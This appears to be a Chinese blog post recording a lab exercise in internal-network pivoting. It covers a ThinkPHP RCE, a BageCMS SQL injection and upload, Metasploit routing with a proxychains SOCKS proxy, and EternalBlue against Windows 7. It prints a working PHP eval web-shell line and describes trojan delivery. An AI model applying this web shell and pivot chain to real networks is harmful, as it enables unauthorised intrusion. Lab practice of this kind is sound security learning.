记一次学习--内网穿透

目录

环境搭建

两张网卡如何配置

Ubuntu配置

渗透

ubuntu的拿下

centos的拿下

探测内网环境

fscan扫描

msf上马

渗透

[拿下bage cms](#拿下bage cms)

windows的拿下

[​编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备](#编辑 使用fscan查看内网环境,发现了192.168.110.128这台设备)

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

​编辑


环境搭建

准备四台虚拟机

一台虚拟机模拟攻击者,一台kali

三台虚拟机模拟内网环境,一台ubuntu、一台centos、一台window7

kali:这台虚拟上有一张网卡

IP:192.168.244.129(nat)

ubuntu:这台虚拟机上有两张网卡一张是NAT模式,一张是主机模式。

IP:192.168.244.154(nat)、192.168.116.128(主机模式)

centos:这台虚拟机上也有两张网卡一张是主机模式、一张是自定义模式

IP:192.168.116.129(主机模式)、192.168.110.128(自定义模式)

window:这台虚拟机上只有一张网卡

IP:192.168.110.129(自定义模式)

两张网卡如何配置

在编辑中寻找虚拟网络编辑器

三张网卡设置不同网段,如下图

我这里设置的是VMnet8是NAT模式模拟可以访问外网的网段

VMnet1和VMnet0设置的是仅主机模式模拟内网

然后再虚拟机中设置网卡,选择不同的模式,即可完成虚拟机中两张网卡的设置

配置完成网络后kali可以ping通Ubuntu的192.168.244.154,Ubuntu可以ping通centos的192.168.116.129,centos可以ping通windows的192.168.110.129

kali ping ubuntu

ubuntu ping centos

centos ping Windows

Ubuntu配置

这台虚拟机上部署了thinkphp5.0.15的版本,我们一会要借助thinkphp5.0.15上的漏洞进行渗透

渗透

ubuntu的拿下

首先查看网站,这里是thinkphp5.0的版本,说不定会有对应的漏洞。经过查找确实有一个命令执行漏洞

执行后进行测试

执行以下命令写入文件

echo '<?php eval($_POST[123]); ?>' >web.php

然后尝试蚁剑连接,连接成功

centos的拿下

我们在Ubuntu执行ip addr,发现ubuntu有两张网卡,猜测这里说不定有内网环境

探测内网环境

现在有两种方式上马一个msf,或者上传一个fscan

fscan扫描

将对应版本的fscan下载到你蚁剑连接的目标机器上

然后加权扫描,扫描过后多出了result文件,查看result文件。发现再116网段下还有一台机器也就是我们的centos,并且该设备开放了80端口

msf上马

显示系统名、节点名称、操作系统的发行版号、操作系统版本、运行系统的机器 ID 号。

msf生成木马

用python架设一个简单的http服务器

python3 -m http.server

获取木马后,然后将木马传递到你蚁剑连接的主机上

上传成功

加权执行

攻击者kali监听

然后由于116现在是内网,所以现在kali无法访问116网段,我们需要添加一条路由才可以访问,下图是路由情况

添加路由,这里由于现在的会话连接的是ubuntu,所以现在是可以通过会话建立到达116的路由的

然后可以创建一个代理服务器

现在创建的代理是kali的1080端口,这个就相当于我们只要连接本地的1080端口就连接到了msf上面,然后就可以走到116的那个网段

在kali的proxychain中将代理设置好(目录/etc//etc/proxychains4.conf )

然后直接使用proxychains扫描80端口

扫描结果

渗透

我们这里搭建了代理服务器所以可以借助火狐来直接访问,在火狐的设置中设置代理

进入设置

进入代理设置

设置代理,这里的代理就是你在proxychain中设置的代理,你选的那个版本就要那个版本,刚刚在代理中选的是sock 4a所以这里就选4a

设置代理之后就可以访问内网网址了

拿下bage cms

我们首先看一下robots.txt文件

进入目录/index.php?r=admin,进入了cms的后台,在这里可以尝试以下密码爆破

或者密码喷撒,我这里没有尝试

这里有一个sql注入漏洞

将账户密码注入出来,登陆后台

然后审计,发现在这里可以上传文件上传以下试一下

上传成功,这里上传成功

windows的拿下

蚁剑设置代理

蚁剑连接,蚁剑连接192.168.116.129成功

查看现在蚁剑连接的192.168.116.129发现有两张网卡

使用fscan查看内网环境,发现了192.168.110.128这台设备

使用msf上马,现在这台机器是不出网的咱们可以正向找到他但是它找不到咱,所以我们要正向连接,生成木马

将木马发送到192.168.110.129

然后用代理启动msf控制台

msf正向连接

192.168.116.129启动木马

连接成功

添加去往192.168.110.0/网段的路由

然后刚刚用fscan扫描出来的结果说192.168.110.129是一台windows7且可能有永恒之蓝这个漏洞

msf使用永恒之蓝漏洞攻击windows7

设置攻击主机

然后exploit就可以了

我这里windows一直拒绝连接不知道为啥

后经过查询是因为Windows在内网中永恒之蓝所以payload要正向连接才可以

相关推荐
Hacker_Oldv1 分钟前
网络安全的学习路线
学习·安全·web安全
蒟蒻的贤4 分钟前
vue学习11.21
javascript·vue.js·学习
高 朗4 分钟前
【GO基础学习】基础语法(2)切片slice
开发语言·学习·golang·slice
码上有前26 分钟前
解析后端框架学习:从单体应用到微服务架构的进阶之路
学习·微服务·架构
岳不谢1 小时前
VPN技术-VPN简介学习笔记
网络·笔记·学习·华为
海害嗨1 小时前
阿里巴巴官方「SpringCloudAlibaba全彩学习手册」限时开源!
学习·开源
小A1592 小时前
STM32完全学习——使用SysTick精确延时(阻塞式)
stm32·嵌入式硬件·学习
小A1592 小时前
STM32完全学习——使用标准库点亮LED
stm32·嵌入式硬件·学习
朝九晚五ฺ3 小时前
【Linux探索学习】第十五弹——环境变量:深入解析操作系统中的进程环境变量
linux·运维·学习
心怀梦想的咸鱼3 小时前
UE5 第一人称射击项目学习(二)
学习·ue5